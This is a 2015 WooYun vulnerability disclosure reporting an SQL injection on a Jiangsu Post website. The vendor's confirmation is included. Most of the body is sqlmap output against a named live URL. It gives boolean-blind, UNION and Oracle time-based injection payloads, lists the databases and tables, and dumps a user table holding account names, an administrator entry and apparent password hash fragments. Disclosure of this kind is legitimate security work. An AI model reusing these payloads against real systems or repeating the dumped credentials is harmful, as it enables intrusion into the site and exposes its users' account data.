当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098263

漏洞标题:江苏邮政公司SQL注入一枚

相关厂商:中国邮政集团公司信息技术局

漏洞作者: Taro

提交时间:2015-02-27 18:09

修复时间:2015-04-13 18:10

公开时间:2015-04-13 18:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

影响多个数据库

详细说明:

http://www.js11183.com/ckplayer/ctvPlay.jsp?id=72

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=72' AND 6546=6546 AND 'YLxL'='YLxL
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=72' UNION ALL SELECT CHR(113)||CHR(103)||CHR(115)||CHR(102)||CHR(113)||CHR(104)||CHR(67)||CHR(74)||CHR(103)||CHR(70)||CHR(100)||CHR(77)||CHR(80)||CHR(66)||CHR(120)||CHR(113)||CHR(102)||CHR(120)||CHR(116)||CHR(113) FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=72' AND 1085=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(86)||CHR(102)||CHR(119),5) AND 'RHTe'='RHTe
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
available databases [15]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] JS183
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
Database: JS183
[23 tables]
+------------------+
| T_AD             |
| T_BOOK           |
| T_BOOK_MEASURE   |
| T_BOOK_NUM       |
| T_BUSINESS_INFO  |
| T_BUSI_RECOMMEND |
| T_CONTENT        |
| T_CTV            |
| T_DEPTMENT       |
| T_DEPT_INFO      |
| T_JOB            |
| T_MEDIA          |
| T_MENU           |
| T_NEWS           |
| T_NOTICE         |
| T_OTHER_INFO     |
| T_PARA           |
| T_PICS           |
| T_POST           |
| T_ROLE           |
| T_TOUSU          |
| T_USER           |
| T_VIDEO          |
+------------------+


Database: JS183
Table: T_USER
[3 entries]
+---------+--------------+------+------+--------+-------------+-------------------+----------+----------+-----------+------------+
| USER_ID | ROLE_ID      | AGE  | SEX  | PASSWD | JOB_NO      | PICTURE           | DEPT_NO  | AREA_NO  | USER_NAME | MENBER_PRO |
+---------+--------------+------+------+--------+-------------+-------------------+----------+----------+-----------+------------+
| sywh    | 221032009999 | 29   | 1    | 62a11b | 22103200047 | 1302257327312.jpg | 00008000 | 22103200 | 苏邮文化      | 5          |
| weihu   | 221032009999 | NULL | NULL | 986c20 | NULL        | NULL              | 00008000 | NULL     | 省管理员      | NULL       |
| null    | null         | NULL | NULL | 96e792 | NULL        | NULL              | null     | NULL     | null      | NULL       |
+---------+--------------+------+------+--------+-------------+-------------------+----------+----------+-----------+------------+


因为数据跑起来太慢,其余的数据库简单测试发现部分数据,就不贴出来了,请及时修复!

漏洞证明:

http://www.js11183.com/ckplayer/ctvPlay.jsp?id=72

修复方案:

版权声明:转载请注明来源 Taro@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-02-28 08:32

厂商回复:

谢谢

最新状态:

暂无